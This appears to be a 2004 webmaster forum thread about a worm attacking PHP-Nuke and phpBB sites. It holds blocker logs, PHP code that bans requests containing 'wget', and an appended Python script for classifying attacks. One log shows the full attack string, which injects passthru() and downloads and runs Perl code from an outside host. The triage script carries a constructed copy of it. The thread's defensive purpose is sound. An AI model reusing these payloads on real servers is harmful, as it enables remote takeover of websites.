64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1164
Posted: Sat Dec 25, 2004 12:09 pm
In an effort to identify who is infected by this worm or virus, I'm enclosing a copy of a few of the IPs that have attacked my site so far.
I'm very curious to discover the root cause of these attacks (failed to update? No anti-virus?), and identifying the sources may aid in this venture while helping others to filter out some of the hosts affected.
Here are SOME of the multiple abuse attempt IPs that I have collected so far:
And many many more!
_________________ Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance.
Last edited by 64bitguy on Sat Dec 25, 2004 2:45 pm; edited 2 times in total

Mesum
Useless
Joined: Aug 23, 2002
Posts: 213
Location: Chicago
Posted: Sat Dec 25, 2004 1:02 pm
I was bombed early this morning by visualcoders.net, which was using some stupid kinda strings.
Their host was informed and they removed the account right away; then the domain whois showed that the owner is from Belgium, so I just called the FBI and let them know about this. They said they already know about it and they think it is just another worm that is supposed to run this string against every phpBB, PHP-Nuke, Postnuke or any other related code. They are trying to find it and stop it.
These were the strings they were using:

zaki
New Member
Joined: Oct 12, 2004
Posts: 9
Posted: Sat Dec 25, 2004 2:04 pm
I have been getting around 500 emails daily for the past two days, all with reasons like Reason: Abuse-Script or Abuse-Harvest; the only common thing between all the attacks is the agent, which is
--------------------
User Agent: lwp-trivial/1.32
Examples:
Date & Time: 2004-12-25 12:51:57
Blocked IP: 217.199.176.8
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: lwp-trivial
--------------------
User Agent: lwp-trivial/1.32
Query String: www.mysite.net/portal/modules.php?name=Forums&file=viewtopic&t=10759
Forwarded For: none
Client IP: none
Remote Address: 217.199.176.8
Remote Port: 4388
Request Method: GET
--------------------
Who-Is for IP: 217.199.176.8
Date & Time: 2004-12-25 12:24:45
Blocked IP: 81.169.168.253
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: lwp-trivial/1.38
Query String: [long chr()-encoded payload omitted]
Forwarded For: none
Client IP: none
Remote Address: 81.169.168.253
Remote Port: 45814
Request Method: GET
or this new one
Date & Time: 2004-12-25 14:22:16
Blocked IP: 69.93.214.106
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.65
Query String: www.mysite.net/portal/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20http://fff.gratishost.com/sess_0bc3910d07edb36750a9babbd179edb2;perl%20sess_0bc3910d07edb36750a9babbd179edb2;wget%20http://fff.gratishost.com/wow.a;perl%20wow.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
Forwarded For: none
Client IP: none
Remote Address: 69.93.214.106
Remote Port: 41817
Request Method: GET
What is this gratishost.com???
Another email with this, which is a normal script to one of the forums. Why blocked?
Date & Time: 2004-12-25 14:18:02
Blocked IP: 69.44.57.36
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: lwp-trivial
--------------------
User Agent: lwp-trivial/1.41
Query String: www.mysite.net/portal/modules.php?name=Forums&file=viewtopic&t=10815
Forwarded For: none
Client IP: none
Remote Address: 69.44.57.36
Remote Port: 46860
Request Method: GET
I wish someone could help me with this. It started two days ago, and now I get tons of emails from Sentinel. Any ideas?
Last edited by zaki on Sat Dec 25, 2004 2:31 pm; edited 3 times in total

64bitguy
Posted: Sat Dec 25, 2004 2:26 pm
Update:
According to multiple hosts contacted, the following information has been identified:
It looks like http://fff.gratishost.com and http://www.visualcoders.net are hosting the worm source code and aiding in propagation.
There is now an official FBI investigation in progress.
Webmasters attacked by this worm are urged to:
1) Contact each host of each attacking domain to advise them to do a virus scan to identify and remove the worm from affected domains.
2) Advise those hosts to notify domain administrators to update their software so as not to be exposed or further vulnerable to the worm.
2A) Also advise hosts of the domain(s) affected that should webmasters fail to update their software immediately (so as not to be susceptible to the worm), that the domain(s) affected should be deactivated until such a time where they do not pose a threat of re-infection and further propagation to others.
This is a situation where people have failed to update their software as advised and thus they are propagating the problem.
There are also a large number of clients attempting to test successful implementation and infection of the worm. Those client IP addresses are also being collected and reported to the FBI for investigation.
While many of these clients are on dial-up, the seriousness of this attack and the involvement of the FBI has led to a great deal of cooperation with ISPs in tracking those involved.
I'll keep you apprised of more information as it becomes available.

SuperCat
Hangin' Around
Joined: Nov 27, 2004
Posts: 37
Location: MN
Posted: Sun Dec 26, 2004 11:16 am
Ok, I figured out that it's showing up in here anyway, but it is wayyyyyyy off to the right side...
I wrote a nice little protection for this so your bandwidth won't get eaten up...
Place this in /includes/custom_files/custom_mainfile.php:
Code:
// Stop processing any request whose query string carries "wget" (literal match only).
// stripos() replaces eregi(), which was removed in PHP 7.
if (stripos($_SERVER['QUERY_STRING'], 'wget') !== false) {
    die();
}
_________________ How deep can we dig the rabbit hole?

zaki
Posted: Sun Dec 26, 2004 12:22 pm
SuperCat, who are you replying to please? Me?
Thanks,

Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Sun Dec 26, 2004 12:26 pm
SuperCat wrote:
    Ok, I figured out that it's showing up in here anyway, but it is wayyyyyyy off to the right side...
    I wrote a nice little protection for this so your bandwidth won't get eaten up...
    Place this in /includes/custom_files/custom_mainfile.php:
    Code:
    // stripos() replaces eregi(), which was removed in PHP 7
    if (stripos($_SERVER['QUERY_STRING'], 'wget') !== false) {
        die();
    }
If it reaches this script, the bandwidth has already been used. Not too sure what this accomplishes (no offense).

SuperCat
Posted: Sun Dec 26, 2004 12:38 pm
The rest of the page won't load. It saves that much.

sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2496
Posted: Sun Dec 26, 2004 1:17 pm
The authorities will probably have as much success with the Brazilian ISPs as we do.
_________________ openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR | GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30

SuperCat
Posted: Sun Dec 26, 2004 6:09 pm
Here is my final code:
Code:
// Ban the client on the first request whose query string carries "wget" (literal match
// only). stripos() replaces eregi(), which was removed in PHP 7.
if (stripos($_SERVER['QUERY_STRING'], 'wget') !== false) {
    require_once("config.php");
    require_once("db/db.php");
    global $db, $prefix;
    // REMOTE_ADDR is set by the web server, but escape it anyway before it goes into SQL
    $ip = addslashes($_SERVER["REMOTE_ADDR"]);
    $sql = "SELECT ip_address FROM ".$prefix."_banned_ip WHERE ip_address='$ip'";
    $result = $db->sql_query($sql);
    // sql_fetchrow() returns false when no row matched, so only then record the ban
    if (!$db->sql_fetchrow($result)) {
        $date = date("Y-m-d");
        $db->sql_query("INSERT INTO ".$prefix."_banned_ip (ip_address, reason, date) VALUES ('$ip', 'wget in URL', '$date')");
        $db->sql_query("DELETE FROM ".$prefix."_session WHERE host_addr='$ip'");
    }
    die();
}
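As an added example (not code from this thread or from PHP-Nuke), here is a small triage script for the sentinel records zaki posted: it parses the records, undoes the double URL-encoding and the chr() concatenation before matching, and flags the highlight-parameter injection. It also shows why a literal "wget" check like SuperCat's filter sees only the second record, and why the plain lwp-trivial page fetch is a false positive of the user-agent rule. The three records, the placeholder download URL and the shortened chr() payload are constructed.

```python
import re
from urllib.parse import unquote
# Constructed stand-ins for the three sentinel records quoted above: the first spells "wget"
# with chr() (a short version of the long payload), the second carries a literal wget and a
# placeholder download URL, the third is an ordinary lwp-trivial page fetch.
SAMPLE = """\
User Agent: lwp-trivial/1.38
Query String: modules.php?name=Forums&highlight=%2527%252esystem(chr(119)%252echr(103)%252echr(101)%252echr(116))%252e%2527
Remote Address: 81.169.168.253
--------------------
User Agent: LWP::Simple/5.65
Query String: modules.php?name=Forums&rush=cd%20/tmp;wget%20http://example.invalid/x;perl%20x&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
Remote Address: 69.93.214.106
--------------------
User Agent: lwp-trivial/1.41
Query String: modules.php?name=Forums&file=viewtopic&t=10815
Remote Address: 69.44.57.36
"""

CMD_WORDS = re.compile(r"\b(wget|curl|perl|system|passthru|exec)\b", re.I)
# a quote that closes phpBB's highlight string, then ".function(" spliced onto it
INJECTION = re.compile(r"highlight='\.\w+\(", re.I)

def parse_records(text):
    """One dict per dash-separated record, built from its 'Key: value' lines."""
    records = []
    for chunk in text.split("-" * 20):
        parts = [line.partition(":") for line in chunk.strip().splitlines()]
        fields = {key.strip(): value.strip() for key, sep, value in parts if sep}
        if fields:
            records.append(fields)
    return records

def normalize(query):
    """Undo repeated URL-encoding (%2527 -> %27 -> ') and fold chr(N). chains into text."""
    prev = None
    while prev != query:
        prev, query = query, unquote(query)
    return re.sub(r"chr\((\d{1,3})\)\.?", lambda m: chr(int(m.group(1))), query)

def classify(record):
    """Verdict plus the evidence of each check, so the false positive is visible."""
    query = record.get("Query String", "")
    decoded = normalize(query)
    result = {"ip": record.get("Remote Address", ""),
              "ua_match": "lwp-trivial" in record.get("User Agent", "").lower(),
              "literal_wget": "wget" in query.lower(),          # all a keyword filter sees
              "decoded_cmd": bool(CMD_WORDS.search(decoded)),   # visible only after decoding
              "injection": bool(INJECTION.search(decoded))}
    result["verdict"] = "attack" if result["injection"] or result["decoded_cmd"] else "benign"
    return result
```

Run `[classify(r) for r in parse_records(SAMPLE)]` to get one verdict per record; only the injection and decoded-command checks drive the verdict, the user-agent match is reported but not used to block.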